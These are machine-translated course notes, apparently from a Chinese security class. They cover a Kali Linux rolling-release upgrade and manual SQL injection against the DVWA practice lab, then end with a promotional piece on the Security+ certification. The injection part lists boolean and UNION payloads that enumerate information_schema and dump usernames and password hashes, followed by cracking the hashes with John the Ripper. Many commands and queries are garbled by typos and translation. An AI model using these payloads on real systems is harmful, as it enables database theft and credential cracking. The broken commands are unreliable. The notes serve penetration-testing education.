Kali version update-----first rolling release
Kali 2.0 announced that it will be updated with rolling release mode (but not implemented)
Fixed-release
Fixed release cycle
Use the mainstream version of software stabilization
Release-----Mainstream-----void
More stable, suitable for enterprise production environment
Rolling release
Used by developers and technicians
Continuously upgrade new version, the pursuit of new features after the fastest use
is becoming popular
Kali version update-----first rolling release
Kali 2.0 Rolling Release
The past 5 months have been tested in a small number of invited people
Use the Debian Testing library as the update source
Package Tracking
http://pkg.kali.org/
WMware Tools vs Open-vm-tools
Apt-get Install Open-vm-tools-desktop Fuse
Gnome 3.18
4.3 cores
Kali version update-----first rolling release
Kali 2.0 existing Version upgrade
Cat << EOF >/etc/apt/sources.list
Deb Http://http.kali.org/Kali kali-rolling main Non-free contrib
Eof
Apt-get Update
Apt-get Dis-upgrade # Get a coffee, or 10.
Reboot
Kali Sana Library will stop updating on April 15, 2016
There are some small problems that I believe will soon be resolved
The tool has been updated
Manual vulnerability Mining-----SQL injection
The server-side program takes the user input parameter as the query condition, directly stitching the SQL statement, and returns the query result to the client browser
User Login Judgment
Select*from users whaere usr= ' uname ' and password= ' pass '
Select*from users whaere usr= ' uname ' and password= ' OR ' = '
[Email protected]:~# ifocnfig
[Email protected]:~# sudo dhclient eth0
Manual vulnerability Mining-----SQL injection
Error-based detection method (low)
'"%()
Boolean-based detection
1 ' and ' 1 ' = ' 1/1 ' and ' 1
1 ' and ' 1 ' = ' 2/1 ' and ' 0
Table column Book/display information in which column
' ORDER by 9--+ #按查询序列号排序 (Comment:-)
select* table Field number = Number of query fields
Federated queries
' Union Select 1,2-+
' UNION ALL Select Database (), 2-+
Manual vulnerability Mining-----SQL injection
Union Select Database (), Substring_index (USER (), "@", 1)--
DB Users: User ()
DB versions: Version ()
Global functions: @ @datadir, @ @hostname, @ @VERSION, @ @version_compile_os
Current Library: Database ()
ASCII to character: char ()
Connection string: Concat_ws (CHAR (32, 58, +), user (), database (), version ())
COMPUTE hash: MD5 ()
MySQL data structure
Information_schema
Manual vulnerability Mining-----SQL injection
All libraries all tables/Statistics the number of tables in each library
Union Select Table_name,table_schema from information_sechema,table--
UNION SELSCT Table_schema.count (*) Frome information_schema,table GROUP by Table_schema--
Table names in the DVWA library
' Union select Table_name,table_schema from Inforamtion_schema from information_schema,table where table_schema= ' Dvwa '- +
All columns in the Users table (user_id, Fist_name, last_name, user, password, avatar)
' Union select Table_name,column_name from Inforation_schema.columns where table_schema= ' dvwa ' and table name= ' users '-+
Querying the contents of the user and password columns
' Union select User,password from dvwa,users-+
' Union select User,password from users-+
' Union select Unll,concat (User,0x3a,password) from users-+
[Email protected]:~# Hash
Hash HASHCAT-CLIXOP Hashid
Hashcat Hashdeep Hash-identifier
[Email protected]:~# hash-identifier
Manual vulnerability Mining-----SQL injection
Password hack
Username:passhash----->dvwa.txt
John--format=raw-md5 Dvwa.txt
[Email protected]:~# ls
[Email protected]:~# cat Dvwa.txt
[Email protected]:~# John--format=raw-md5 Dvwa.txt
This note is for safe Cattle class student notes, want to see this course or information security of dry goods can go to safe cattle classes
security+ Certification Why is the Internet + era of the most popular certification?
Manifesto first introduce you to security+
security+ certification is a neutral third-party certification, the issuing agency for the United States Computer Industry Association CompTIA, and CISSP, ITIL and other common inclusion of the international IT Industry 10 Popular certification, and CISSP emphasis on information security management, compared to security+ Authentication is more emphasis on information security technology and operations.
This certification demonstrates your ability to network security, compliance and operational security, threats and vulnerabilities, application, data and Host security, access control and identity management, and encryption technology. Because of its difficult examination difficulty, the gold content is high, has been widely adopted by global enterprises and security professionals.
Why is security+ certification so hot?
Reason one: In all information security certification, the emphasis on information security technology certification is blank, security+ certification just can make up for information security technology field blank.
currently recognized in the industry of information security certification mainly Cisp and CISSP, but whether cisp or CISSP are emphasis on information security management, technical knowledge is broad and simple, the exam is around. And CISSP require a certificate of information security work experience for more than 5 years, Cisp also require a college education 4 years of working experience, these requirements will undoubtedly be able and motivated young people of the road blocked. In the real world, whether it is looking for a job or a raise, or a tender time to report personnel, certification is essential, which brings a lot of injustice to young people. The emergence of security+ can clear these young people career development obstacles, because security+ emphasis on information security technology, so there is no special requirements for work experience. As long as you have an IT-related background, the pursuit of progress can be studied and tested.
Reason two: it operation and maintenance personnel work and turn over the weapon.
in the banking, securities, insurance, information and communications industries, IT operations personnel are very many, it operations involved in the face is also very wide. is a network, system, security, application architecture, storage as one integrated technology post. Although no program ape "born as a Bachelor, Die also write code," The solemn and tragic, but also has "Hoe wo Day Copse, as the operation of suffering" feeling. Every day to the computer and machine, the time has been inevitable for career development confusion and confusion. The advent of security+ international certification allows the pursuit of IT operations personnel to learn network security knowledge, to master network security practices. Career development in the direction of network security, to solve the problem of the shortage of information security personnel in China. In addition, even if not transformation, to do a good job in operation and maintenance, learning safety knowledge to obtain safety certification is also essential.
reason three: grounding gas, international stylish, easy examination, moderate cost!
comptia is professional, fair and impartial in the field of information security talent certification. Security+ certification is highly operational and closely related to the daily work of frontline engineers. Suitable for banks, securities, insurance, internet companies and other IT-related personnel learning. As an international certification in 147 countries around the world are widely recognized.
Under the current tide of information security, talent is the key to the development of information security. and the current domestic information security personnel is very scarce, I believe security+ certification will become the most popular information security certification.
"Safe Cow study notes"? Kali version Update and Manual vulnerability Mining (SQL injection)